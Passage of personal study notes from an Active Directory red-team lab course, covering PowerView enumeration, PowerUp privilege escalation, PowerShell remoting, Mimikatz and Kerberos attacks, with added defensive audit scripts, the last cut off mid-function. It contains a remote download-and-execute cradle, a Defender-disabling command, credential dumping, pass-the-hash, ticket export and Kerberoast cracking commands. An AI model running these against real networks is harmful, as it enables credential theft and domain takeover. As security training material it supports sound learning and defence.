
Windows Reddish Squad Lab (Video Notes)

Lesson 1 Basics:

Active Directory:
- Directory service used to manage Windows networks
- stores information about objects on the network and makes it easily available to users and domains
- Active Directory enables centralized, secure management of an entire network, which might span a building, a city or multiple locations
- Schema - defines objects and their attributes
- Query and index mechanism - provides searching and publishing of objects and their properties
- Global Catalog - contains information about every object in the directory
- Replication Service - distributes information across domain controllers
- Forests, domains and organizational units (OUs) are the basic building blocks of any Active Directory structure.
    - a forest is a security boundary - it may contain multiple domains, and each domain may contain multiple OUs.

PowerShell:
- provides access to almost everything in a Windows platform and AD environment, which could be useful for an attacker
- provides the capability of running powerful scripts completely from memory, making it ideal for foothold shells/boxes
- easy to learn and really powerful
- based on the .NET framework and tightly integrated with Windows
- PowerShell Core is platform independent

Open up Windows PowerShell ISE as an Administrator:

See the file with PowerShell commands...

Cmdlets are used to perform an action, and a .NET object is returned as the output.
Cmdlets take parameters for different operations.
They have aliases.
These are NOT executables; you can write your own cmdlet with a few lines of script.

Examples:
cd C:\
dir         //this works (dir is an alias, not an executable)
dir.exe     //this does not

Important!
Use the below command for listing all cmdlets:
get-command -commandtype cmdlet

There are many interesting cmdlets from a pentester's perspective.
For example, get-process lists the processes running on a system:
get-process

get-command -Name *process*
get-command -Verb set

The PowerShell ISE is a GUI editor/scripting environment.
Tab completion, context-sensitive help, syntax highlighting, selective execution and in-line assistance are some of its useful features.
It comes with a handy console pane to run commands from the ISE.

Execution Policy:
- this is NOT a security measure; it is a safety measure meant to prevent a user from accidentally executing scripts
- several ways to bypass:
powershell -ExecutionPolicy Bypass .\script.ps1
powershell -c <cmd>
powershell -enc <base64-encoded command>

Turn off Windows Defender real-time monitoring (requires admin rights):
Set-MpPreference -disablerealtimeMonitoring $true

.\Invoke-Encode.ps1
Get-ExecutionPolicy
powershell -ep bypass
Powershell.exe -ExecutionPolicy bypass -File C:\Users\win10\Downloads\nishang-master\Utility\Invoke-Encode.ps1

- PowerShell also supports modules.
- A module can be imported with:
Import-Module <path to module>

- all the commands in a module can be listed with:
Get-Command -Module <modulename>
Get-Command -Module ScheduledTasks    //e.g. the module that provides Get-ScheduledTask

################
. c:\AD\Tools\Invoke-Encode.ps1
- the '.' in front of the path (above) is called dot sourcing.
################

Whenever there is a command execution opportunity, PowerShell scripts can be executed using the following methods:
- Download-execute cradle:
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
- EncodedCommand:
powershell.exe -?    //to list the command-line options of powershell.exe, including -EncodedCommand

Check out Invoke-CradleCrafter:
http://github.com/danielbohannon/Invoke-CradleCrafter

#####################
Lesson 2 Domain Enumeration:

PowerShell and AD:
- [ADSI]
- .NET Classes
- Native Executables
- PowerShell (.NET classes or WMI or Active Directory Module)

Let's start with domain enumeration and map the various entities, trusts, relationships and privileges of the target domain.
We will use open source tools, such as PowerView, for domain enumeration.

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

We will also use the Microsoft Active Directory module:
https://docs.microsoft.com/en-us/powershell/module/addsadministration/

After spending some time installing PowerView and running Install-ActiveDirectoryModule.ps1, we can finally start doing some domain enumeration!

PS C:\users\win10\Downloads> powershell.exe -executionpolicy unrestricted
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\users\win10\Downloads> .\Install-ActiveDirectoryModule.ps1

NAME
    Install-ADModule

SYNOPSIS
    Installs the AD PowerShell module from RSAT for Windows 10
(partial copy above)

- Get the current domain (PowerView):
Get-NetDomain
Get-NetDomain -Domain lethallab.local

- Get the current domain SID:
Get-DomainSID

- Using the Active Directory module:
Get-ADDomain
Get-ADDomain -Identity lethallab.local
(Get-ADDomain).DomainSID.Value


Let's set up the environment!
You should make sure you have a properly working Domain Controller, as all the information is being pulled from a Domain Controller.


PS C:\Users\win10\Downloads\PowerSploit-master\Recon> Import-Module .\PowerView.ps1
PS C:\users\win10\Downloads\PowerSploit-master\recon> get-command -module recon
PS C:\users\win10\Downloads\PowerSploit-master\recon> get-netdomain

PS C:\Users\win10\Downloads\PowerSploit-master\Recon> get-netdomain -domain lethallab.local


Forest                  : lethallab.local
DomainControllers       : {Win2008SRV.lethallab.local, WIN2016SRV.lethallab.local}
Children                : {}
DomainMode              : Windows2003Domain
DomainModeLevel         : 2
Parent                  :
PdcRoleOwner            : Win2008SRV.lethallab.local
RidRoleOwner            : Win2008SRV.lethallab.local
InfrastructureRoleOwner : Win2008SRV.lethallab.local
Name                    : lethallab.local

- Get Domain Controllers for a domain:
PS C:\Users\win10\Downloads> Get-NetDomainController
PS C:\Users\win10\Downloads> Get-NetDomainController -domain lethallab.local

- Using Active Directory module:
Get-ADDomainController
Get-ADDomainController -Discover -DomainName lethallab.local

- Get users of a domain:
Get-NetUser
Get-NetUser | select name
Get-NetUser -Domain lethallab.local
Get-NetUser -UserName win10

- Using the Active Directory module:
Get-ADUser -Filter * -Properties *
Get-ADUser -Server ps-dc.lethallab.local
Get-ADUser -Identity win10

- Get all the groups in the current domain:
Get-NetGroup
Get-NetGroup *admin*

- Using Active Directory Module:
Get-ADGroup -Filter * | select Name
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
get-adgroup -filter {Name -like "*admin*"} | select name

- Get all the members of the Domain Admins group:
Get-NetGroupMember -GroupName "Domain Admins"

- Using the Active Directory module:
Get-ADGroupMember -Identity "Domain Admins" -Recursive

- Get the group membership of a user:
Get-NetGroup -UserName "labuser"

- Using ActiveDirectory Module:
Get-ADPrincipalGroupMembership -Identity labuser

- Get all computers of the domain:
Get-NetComputer
Get-NetComputer -FullData

- Using ActiveDirectory Module:
Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter * -Properties *

Note to self: You should keep in mind and consider that the information is pulled from the data your Domain Controller has, and it is not an indication that the physical computer still exists. Most companies keep obsolete information in Active Directory, because they never go through an Active Directory maintenance and cleanup. In either case, the information can still be useful in your exploitation attempts!
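To make the point above measurable, here is an added example (not from the course notes) that separates the computer accounts returned by enumeration into "probably live" and "probably stale" objects, using the replicated lastLogonTimestamp; it assumes the ActiveDirectory module (RSAT) and a reachable DC, and the 90-day threshold and the optional server name are assumptions for the lab.

```powershell
# Added example: flag computer accounts that have not logged on for a while,
# so obsolete AD objects (the ones the note warns about) stand out for cleanup.
Import-Module ActiveDirectory

function Get-StaleComputerReport {
    param(
        [int]$StaleDays = 90,
        [string]$Server        # optional DC to query, e.g. win2016srv.lethallab.local
    )
    $cutoff = (Get-Date).AddDays(-$StaleDays)
    $params = @{
        Filter     = '*'
        Properties = 'LastLogonDate', 'OperatingSystem', 'PasswordLastSet', 'Enabled'
    }
    if ($Server) { $params['Server'] = $Server }

    Get-ADComputer @params | ForEach-Object {
        # LastLogonDate is the replicated lastLogonTimestamp (only accurate to ~14 days).
        # A computer that never logged on has a null value and is treated as stale.
        $lastSeen = $_.LastLogonDate
        $isStale  = (-not $lastSeen) -or ($lastSeen -lt $cutoff)
        [pscustomobject]@{
            Name            = $_.Name
            Enabled         = $_.Enabled
            OperatingSystem = $_.OperatingSystem
            LastLogonDate   = $lastSeen
            PasswordLastSet = $_.PasswordLastSet
            Stale           = $isStale
        }
    }
}

# Stale accounts first, then the rest by most recent logon.
Get-StaleComputerReport -StaleDays 90 |
    Sort-Object Stale, LastLogonDate -Descending |
    Format-Table -AutoSize
```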

- Find all machines on the current domain where the current user has local admin access:
Find-LocalAdminAccess -verbose

- Find local admins on all machines of the domain:
Invoke-EnumerateLocalAdmin -verbose

- List sessions on a particular computer:
Get-NetSession -ComputerName ops-dc

Note: Domain Administrator is a very sought-after target, but DO NOT go after the Domain Admin (DA) blindly! Make sure that getting the DA account is the goal/purpose of the engagement!

- Find computers where a domain admin is logged in and the current user has access:
Invoke-UserHunter -CheckAccess -Verbose

- The above gets a list of machines from the DC and lists the sessions and logged-on users from each machine! This is not easy to find, but it is still a useful command to run!


Hands-On number 1:
- Enumerate the following for the current domain:
Users, Computers, Domain Administrators, Shares, Sessions on the Domain Controller.

Demonstration: Block user hunting (session enumeration) on the Domain Controller!
- we can use a script called NetCease.ps1 that strips such permissions from a box.

######
Domain Enumeration - ACL:
You can find ACLs in Active Directory under a user (for example): Security tab, Advanced, and then the Permissions tab.

- Get the ACLs associated with the specified object:
Get-ObjectACL -SamAccountName win10 -ResolveGUIDs

- Get the ACLs associated with the specified prefix to be used for search:
Get-ObjectACL -ADSprefix 'CN=Administrator, CN=Users' -Verbose

- We can also enumerate ACLs using the Active Directory module, but without resolving GUIDs:
(Get-ACL 'AD:\CN=win10, CN=Users, DC=win2008srv, DC=lethallab, DC=local').Access

- To look for interesting ACEs:
Invoke-ACLScanner -ResolveGUIDs


Hands-On number 2:
- Enumerate the following for the current domain:
Check if the win10 user has Write/Modify permissions on any objects!


##############
Domain Enumeration - Trusts:
- Get a list of all domain trusts for the current domain, if you have any; it is possible that in your home lab network you won't have any, since you only have one forest or (at most) one child domain:
Get-NetDomainTrust                        //don't worry if you don't have any in your lab domain
Get-NetDomainTrust -Domain redps.offensiveps.lethallab.local    //this would be a child domain of the lethallab.local domain

- Using Active Directory Module:
Get-ADTrust -Filter *
Get-ADTrust -Identity redps.offensiveps.lethallab.local

- Get details about the current forest:
Get-NetForest
Get-NetForest -Forest lethallab.local

- Using Active Directory Module:
Get-ADForest
Get-ADForest -Identity lethallab.local

- Get all domains in the current forest:
Get-NetForestDomain
Get-NetForestDomain -Forest lethallab.local

- Using ActiveDirectory Module:
(Get-ADForest).Domains

- Get trusts in the forest (if you have a forest trust in your lab; if you don't, then don't expect any output):
Get-NetForestTrust
Get-NetForestTrust -Forest lethallab.local

- Using ActiveDirectory Module:
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

Hands-On number 3:
Enumerate all the trusts - domain trusts, external trusts and others - for the current forest.

#####################
Lesson 3 Local Privilege Escalation:

- up to now, we have only done a lot of enumeration!

In an AD environment, there are multiple scenarios which lead to privilege escalation. We had a look at the following:
- Hunting for Local Admin access on other machines
- Hunting for high-privilege domain accounts (like a Domain Admin)
There are various ways to escalate privileges on Windows boxes:
- Missing patches
- Automated deployment and AutoLogon passwords in clear text
- AlwaysInstallElevated (any user can run MSI as SYSTEM)
- Misconfigured Services
- DLL Hijacking
- Token Manipulation or Impersonation

PowerUp:
- Let's use PowerUp from PowerSploit for local privilege escalation by abusing services.
- Get services with unquoted paths and a space in their name or executable path:
Get-ServiceUnquoted -Verbose

ex:
Get-WmiObject win32_service | fl *

For instance, if the path c:\ftpserver\ftp server\myftp\ftp.exe is unquoted, Windows resolves it piece by piece (it tries c:\ftpserver\ftp.exe first), so an attacker can drop an ftp.exe there and, as soon as the program is run by a user with the right permissions, we can escalate privileges. That's why it's called the unquoted path vulnerability! For this NOT to work, the path would have to be in quotes, like this:
"c:\ftpserver\ftp server\myftp\ftp.exe"
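The unquoted-path condition above, as a stand-alone check rather than PowerUp: this added example (not from the course notes or from PowerSploit) tests any image path string, lists the locations Windows would try before the real binary, and runs the check over the local services via CIM; the function names are assumptions.

```powershell
# Added example: detect the unquoted service path condition and show which
# intermediate paths CreateProcess would try. Runs on any Windows PowerShell host.

function Test-UnquotedServicePath {
    param([Parameter(Mandatory)] [string]$PathName)
    $p = $PathName.Trim()
    # A quoted image path is safe regardless of spaces.
    if ($p.StartsWith('"')) { return $false }
    # Strip service arguments: the executable is everything up to and including ".exe".
    $m = [regex]::Match($p, '^(.*?\.exe)', 'IgnoreCase')
    $exe = if ($m.Success) { $m.Groups[1].Value } else { $p }
    return $exe.Contains(' ')
}

function Get-UnquotedPathCandidates {
    # Returns, in order, the paths Windows tries before reaching the real executable:
    # for "c:\a b\c d\x.exe" that is c:\a.exe then c:\a b\c.exe.
    param([Parameter(Mandatory)] [string]$PathName)
    $m = [regex]::Match($PathName.Trim(), '^(.*?\.exe)', 'IgnoreCase')
    $exe = if ($m.Success) { $m.Groups[1].Value } else { $PathName.Trim() }
    $parts = $exe -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Get-UnquotedServicePath {
    # Local services whose image path is unquoted and contains a space.
    Get-CimInstance Win32_Service | Where-Object {
        $_.PathName -and (Test-UnquotedServicePath $_.PathName)
    } | ForEach-Object {
        [pscustomobject]@{
            Name       = $_.Name
            StartName  = $_.StartName     # LocalSystem turns this into a SYSTEM-level finding
            PathName   = $_.PathName
            Candidates = (Get-UnquotedPathCandidates $_.PathName) -join '; '
        }
    }
}

# Worked check on the path from the notes (no service required):
Test-UnquotedServicePath 'c:\ftpserver\ftp server\myftp\ftp.exe'
Test-UnquotedServicePath '"c:\ftpserver\ftp server\myftp\ftp.exe"'
Get-UnquotedPathCandidates 'c:\ftpserver\ftp server\myftp\ftp.exe'
Get-UnquotedServicePath | Format-Table -AutoSize
```

A finding only matters if one of the candidate directories is writable by a low-privileged user, which is exactly what the "ModifiableFile" columns in the PowerUp output further down report.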

- Get services where the current user can write to the binary path:
Get-ModifiableServiceFile -Verbose

- Get the services which the current user can modify:
Get-ModifiableService -Verbose

- Run all checks:
Invoke-AllChecks

Example:
PS C:\Users\win10\Downloads\PowerSploit-master> cd .\Privesc\
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> ls
    Directory: C:\Users\win10\Downloads\PowerSploit-master\Privesc

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         9/2/2018  11:55 PM          26485 Get-System.ps1
-a----         9/2/2018  11:55 PM         562841 PowerUp.ps1
-a----         9/2/2018  11:55 PM           1564 Privesc.psd1
-a----         9/2/2018  11:55 PM             67 Privesc.psm1
-a----         9/2/2018  11:55 PM           4297 README.md

PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Import-Module .\PowerUp.ps1
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Invoke-AllChecks
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[+] User is in a local group that grants administrative privileges!
[+] Run a BypassUAC attack to elevate privileges to admin.
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
ServiceName                     : ISSUSER
Path                            : "C:\Program Files\LANDesk\LDClient\issuser.exe" /SERVICE
ModifiableFile                  : C:\
ModifiableFilePermissions       : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem                        <----- runs as LOCALSYSTEM!
AbuseFunction                   : Install-ServiceBinary -Name 'ISSUSER'
CanRestart                      : False                        <------- we need to wait for the machine to be rebooted

ServiceName                     : ISSUSER
Path                            : "C:\Program Files\LANDesk\LDClient\issuser.exe" /SERVICE
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'ISSUSER'
CanRestart                      : False

[*] Checking service permissions...
[*] Checking %PATH% for potentially hijackable DLL locations...

ModifiablePath    : C:\Users\win10\AppData\Local\Microsoft\WindowsApps
IdentityReference : LETHALLAB\win10
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\win10\AppData\Local\Microsoft\WindowsApps
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\win10\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials in registry...
[*] Checking for modifidable registry autoruns and configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
[*] Checking for cached Group Policy Preferences .xml files....

PS C:\Users\win10\Downloads\PowerSploit-master\Privesc>

##########
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Invoke-ServiceAbuse

PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Invoke-ServiceAbuse -examples

PS C:\Users\win10\Downloads\PowerSploit-master\Privesc> Invoke-ServiceAbuse -Name AbyssWebServer -UserName 'lethallab\win10'

- the last Invoke-ServiceAbuse command will add the current user (win10) to the local Administrators group. We had to read the Invoke-ServiceAbuse help with the -examples parameter, so that we could learn how to run the command properly. We will need to log off from the account and log on again, so that the new permissions take effect!

And now, with admin privileges, we can run the command below to disable AV protection:
>Set-MpPreference -DisableRealtimeMonitoring $true

Hands-On number 4:
Exploit a service on your lab VM and elevate privileges to local administrator!

#####################
Lesson 4 Lateral Movement Protocols and Tools:

PowerShell Remoting
Think of it as psexec on steroids.
You will find this increasingly used in enterprises. Enabled by default on Server 2012 onwards!
You may need to enable remoting (Enable-PSRemoting) on desktop Windows machines; admin privileges are required to do that.
You get an elevated shell on the remote system if admin creds are used to authenticate (which is the default setting).

One-to-One
PSSession:
- Interactive
- Runs in a new process (wsmprovhost)
- Is stateful
Useful cmdlets:
- New-PSSession
- Enter-PSSession

Example:
PS C:\Users\Administrator.WIN2008SRV> new-pssession -ComputerName win2016srv

 Id Name            ComputerName    State    ConfigurationName     Availability
 -- ----            ------------    -----    -----------------     ------------
  1 Session1        win2016srv      Opened   Microsoft.PowerShell     Available

PS C:\Users\Administrator.WIN2008SRV> $sess = New-PSSession -ComputerName win2016srv
PS C:\Users\Administrator.WIN2008SRV> Enter-PSSession -session $sess
[win2016srv]: PS C:\Users\administrator\Documents> hostname
WIN2016SRV

PowerShell Remoting:
- One-to-Many
- Also known as Fan-Out remoting
- non-interactive
- executes commands in parallel
- useful cmdlets:
    - Invoke-Command
- Invoke-Command runs commands and scripts on:
    - multiple remote computers
    - in disconnected sessions (v3)
    - as background jobs, and more.
- the best thing in PowerShell for passing the hashes, using credentials and executing commands on multiple remote computers.
- Use the -Credential parameter to pass username/password.
- use the below to execute commands or semicolon-separated scripts:
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list of servers>)

example:
Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName win2016srv
PS C:\Users\Administrator.WIN2008SRV> Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName win2016srv
lethallab\administrator
WIN2016SRV

Invoke-Command -ScriptBlock{$who = whoami} -ComputerName win2016srv
Invoke-Command -ScriptBlock{$who} -ComputerName win2016srv    //returns nothing: each Invoke-Command runs in a fresh session, so $who is gone

- use the below command to execute scripts from files:
Invoke-Command -FilePath c:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list of servers>)

ex:
Invoke-Command -FilePath c:\AD\Tools\Invoke-Encode.ps1 -ComputerName Win2016srv

powershell.exe -ep bypass
. c:\AD\Tools\Invoke-Mimikatz.ps1
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -ComputerName win2016srv

- Use the below to execute "stateful" commands:
$Sess = New-PSSession -ComputerName Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}

$sess = New-PSSession -ComputerName win2016srv
Invoke-Command -ScriptBlock{$who = whoami} -Session $sess
Invoke-Command -ScriptBlock{$who} -Session $sess
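Fan-out remoting is just as useful for a defensive sweep as for execution: this added example (not from the course notes) uses Invoke-Command to collect, from each host in parallel, whether Defender real-time protection is on (the setting the notes switch off with Set-MpPreference), the execution policy and the local Administrators membership, and reports unreachable hosts instead of aborting. The host names and the optional credential are assumptions for the lab.

```powershell
# Added example: one-to-many remoting used to audit hosts rather than to run payloads.
function Get-HostSecurityState {
    param(
        [Parameter(Mandatory)] [string[]]$ComputerName,
        [pscredential]$Credential
    )
    # This block runs on every target; only objects travel back over the wire.
    $remote = {
        $mp = $null
        try { $mp = Get-MpComputerStatus -ErrorAction Stop } catch { }
        $rt = 'unknown'; $av = 'unknown'
        if ($mp) { $rt = $mp.RealTimeProtectionEnabled; $av = $mp.AntivirusEnabled }
        $admins = '<unavailable>'
        try { $admins = (Get-LocalGroupMember -Group 'Administrators' -ErrorAction Stop).Name -join ', ' } catch { }
        [pscustomobject]@{
            Host        = $env:COMPUTERNAME
            RealTimeAV  = $rt
            AntivirusOn = $av
            ExecPolicy  = (Get-ExecutionPolicy).ToString()
            LocalAdmins = $admins
        }
    }
    $params = @{
        ComputerName  = $ComputerName
        ScriptBlock   = $remote
        ErrorAction   = 'SilentlyContinue'
        ErrorVariable = 'failed'
    }
    if ($Credential) { $params['Credential'] = $Credential }

    # Invoke-Command runs the block on all hosts in parallel; hosts that cannot be
    # reached end up in $failed and are reported explicitly instead of being dropped.
    $results = @(Invoke-Command @params)
    foreach ($f in $failed) {
        $results += [pscustomobject]@{
            Host = [string]$f.TargetObject; RealTimeAV = 'unreachable'; AntivirusOn = 'unreachable'
            ExecPolicy = ''; LocalAdmins = ''
        }
    }
    $results | Select-Object Host, RealTimeAV, AntivirusOn, ExecPolicy, LocalAdmins
}

Get-HostSecurityState -ComputerName 'win2016srv', 'win2008srv' | Format-Table -AutoSize
```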

Invoke-Mimikatz:
- the script can be used to dump credentials, tickets and more using mimikatz with PowerShell, without dropping the exe to disk.
- it is useful for passing and replaying hashes and tickets, and for many exciting Active Directory attacks
- using the code from ReflectivePEInjection, mimikatz is loaded reflectively into memory. All the functions of mimikatz are usable from this script!

- mimikatz is still being detected, but we can still use it with a download cradle, or anywhere we can execute commands or PowerShell.

- Dump Credentials on a local machine:
Invoke-Mimikatz -DumpCreds

- Dump certs on a local machine:
Invoke-Mimikatz -DumpCerts

- Dump Credentials on multiple remote machines:
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")

- Invoke-Mimikatz uses the PowerShell remoting cmdlet Invoke-Command to run the above command. Thus, credentials or administrative access to the remote computers is required!

- "Over-pass-the-hash": generate tokens from hashes:
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:. /ntlm:<ntlmhash> /run:powershell.exe"'
(we can run any command instead of powershell.exe)

Token Manipulation:
- it is possible to use/impersonate tokens available on a machine
- often tokens are available on machines due to interactive logons, accessing resources, running processes, SSO applications, etc.
- we can use Invoke-TokenManipulation from PowerSploit or Incognito for token impersonation
- administrative privileges are required to adjust token privileges.

- List all the tokens on a machine:
Invoke-TokenManipulation -ShowAll

- List all unique, usable tokens on a machine:
Invoke-TokenManipulation -Enumerate

- Start a new process with the token of a specific user:
Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"

- Start a new process with the token of another process:
Invoke-TokenManipulation -CreateProcess "C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -ProcessID 500

#############################
Video 5 Domain Privilege Escalation:

NOTE: some information below might not be accurate, because I didn't have a trust domain configured in my home lab; so take it with a grain of salt, but know that the commands are accurate and the only thing you should worry about is the domains in the command.

Read up on Kerberos authentication and how the client computer contacts the KDC/DC server to receive the TGT/TGS so that it can access an application server, and also how every step is abusable!

Kerberoast:
- offline cracking of service account passwords
- the Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of the service account. This makes it possible to request a ticket and do offline brute-forcing.
- service accounts are many times ignored (passwords are rarely changed) and have Domain Admin privilege access.
- password hashes of service accounts could be used to create Silver tickets.
- presented by Tim Medin at DerbyCon 2014.


When requesting a TGS ticket (TGS-REQ), the client presents its TGT, which is encrypted with the krbtgt hash.
The TGS is encrypted using the target service's NTLM hash (TGS-REP).
We can request a TGS for any service and the KDC will reply with the TGS ticket.

- Find Service Accounts:
GetUserSPNs
https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1

- PowerView:
Get-NetUser -SPN

Note: for the above command, you should know which user accounts are domain admins!

- Active Directory module (to find krbtgt and privileged service accounts):
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

- Request a ticket:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQL/win2016srv.lethallab.local:SQLEXPRESS"

- Request a ticket using PowerView:
Request-SPNTicket

- Check if the ticket has been granted:
klist.exe

- Export all tickets using Mimikatz:
Invoke-Mimikatz -Command '"kerberos::list /export"'
ls

Crack the service account password:
python.exe .\tgsrepcrack.py .\passwords.txt '.\2-40a10000-labuser@MSSQLvc ops-win2016srv.lethallab.local SQLEXPRESS-lethallab.local.kirbi'
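The defender's view of the same section: this added example (not from the course notes) lists the user accounts a TGS request could target and, for each, the two things that make a Kerberoast attempt worthwhile, an old password and membership in a privileged group, plus whether the account still accepts RC4 tickets; it assumes the ActiveDirectory module, and the group list and the 365-day threshold are assumptions.

```powershell
# Added example: audit Kerberoast exposure. An SPN on a user account is what makes
# a TGS requestable; password age, privilege and RC4 support decide the impact.
Import-Module ActiveDirectory

function Get-KerberoastExposure {
    param([int]$MaxPasswordAgeDays = 365)
    # Members of these groups make a roastable account a direct path to DA.
    $privGroups  = 'Domain Admins', 'Enterprise Admins', 'Administrators'
    $privMembers = foreach ($g in $privGroups) {
        try { (Get-ADGroupMember -Identity $g -Recursive -ErrorAction Stop).SamAccountName } catch { }
    }
    $cutoff = (Get-Date).AddDays(-$MaxPasswordAgeDays)
    $props  = 'ServicePrincipalName', 'PasswordLastSet', 'msDS-SupportedEncryptionTypes', 'AdminCount'

    # krbtgt also carries an SPN but belongs to the golden-ticket discussion, not here.
    Get-ADUser -Filter { ServicePrincipalName -like '*' } -Properties $props |
      Where-Object { $_.SamAccountName -ne 'krbtgt' } |
      ForEach-Object {
        $enc = $_.'msDS-SupportedEncryptionTypes'
        # msDS-SupportedEncryptionTypes bits: 0x4 = RC4-HMAC, 0x8 = AES128, 0x10 = AES256.
        # Unset (or 0) means the KDC falls back to RC4, whose tickets crack far faster than AES.
        $rc4Allowed = (-not $enc) -or (($enc -band 0x4) -ne 0) -or (($enc -band 0x18) -eq 0)
        [pscustomobject]@{
            Account         = $_.SamAccountName
            SPNs            = ($_.ServicePrincipalName -join ' ')
            PasswordLastSet = $_.PasswordLastSet
            OldPassword     = (-not $_.PasswordLastSet) -or ($_.PasswordLastSet -lt $cutoff)
            Privileged      = ($privMembers -contains $_.SamAccountName) -or ($_.AdminCount -eq 1)
            RC4Allowed      = [bool]$rc4Allowed
        }
      } | Sort-Object Privileged, OldPassword -Descending
}

Get-KerberoastExposure | Format-Table -AutoSize
```

Accounts that show Privileged and OldPassword together are the ones to move to long random passwords or group-managed service accounts first.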

Kerberos Delegation:
- Kerberos delegation allows "reuse of the end-user credentials to access resources hosted on a different server", like an application server or database server. This is mostly used where a Kerberos double hop is required.
- Impersonating the incoming/authenticating user is necessary for any kind of Kerberos delegation to work.
- Kerberos delegation is of 2 types:
    - Unconstrained (the only option till Server 2003)
    - Constrained

How does Kerberos delegation work:
- a user provides credentials to the Domain Controller
- the DC returns a TGT
- the user requests a TGS for the web service on the web server
- the DC provides a TGS.
- the user sends the TGT and TGS to the web server.
- the web server service account uses the user's TGT to request a TGS for the database server from the DC.
- the web server service account connects to the database server as the user.

Unconstrained Delegation:
When set for a particular service account, unconstrained delegation allows delegation to any service on that particular machine.
The service account can then request access to any service in the domain by impersonating the incoming user (because the DC placed the user's TGT inside the TGS in step 4). In our example, the web server service account can request access to any service in the domain as the user connecting to it.
This could be used to escalate privileges in case we can compromise such a machine and a Domain Admin (or other high-privilege user) connects to that machine.

- Discover domain computers which have unconstrained delegation enabled using PowerView:
Get-NetComputer -UnConstrained

- Using Active Directory Module:
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

- We need to compromise the server where unconstrained delegation is enabled and wait for (or trick) a high-privilege user to connect to the box. Once such a user is connected, we can export all the tickets, including the TGT of that user, using the following command:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Note: we need administrator rights on the server where unconstrained delegation is enabled!

- the ticket can be reused:
Invoke-Mimikatz -Command '"kerberos::ptt c:\tickets\admin.kirbi"'


Constrained Delegation:
- Introduced in Server 2008
- as the name suggests, constrained delegation allows access only to specified services on specific computers!
- a typical abusable scenario is when a user authenticates using non-Kerberos authentication and Protocol Transition is used by Kerberos to support single sign-on.
- A couple of Kerberos extensions come into play for Protocol Transition, but we are not going to talk about them.
- The service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION (T2A4D) UserAccountControl attribute.
- the service account can access all the services specified in its msDS-AllowedToDelegateTo attribute.
- another interesting issue is that the delegation occurs not only for the specified service but for any service running under the same account. There is no validation of the SPN specified.

- Enumerate users and computers with constrained delegation enabled.

- Using PowerView (dev):
.\PowerView-Dev.ps1
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

- Using Active Directory Module:
Get-AdObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
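Both delegation flavours in one report: this added example (not from the course notes or PowerView) decodes the userAccountControl bits directly (TRUSTED_FOR_DELEGATION for unconstrained, TRUSTED_TO_AUTH_FOR_DELEGATION for T2A4D) and lists the msDS-AllowedToDelegateTo targets, so a defender can see every account whose delegation settings need review; it assumes the ActiveDirectory module.

```powershell
# Added example: enumerate unconstrained and constrained delegation from the raw
# attributes, for both user and computer objects.
Import-Module ActiveDirectory

# userAccountControl flag values (ADS_USER_FLAG enumeration).
$TRUSTED_FOR_DELEGATION         = 0x80000     # unconstrained delegation
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # T2A4D: constrained delegation with protocol transition

function Get-DelegationReport {
    $props = 'userAccountControl', 'msDS-AllowedToDelegateTo'
    # Both user and computer objects can carry delegation settings.
    Get-ADObject -LDAPFilter '(|(objectClass=user)(objectClass=computer))' -Properties $props |
      ForEach-Object {
        $obj     = $_
        $uac     = [int64]$obj.userAccountControl
        $targets = @($obj.'msDS-AllowedToDelegateTo' | Where-Object { $_ })
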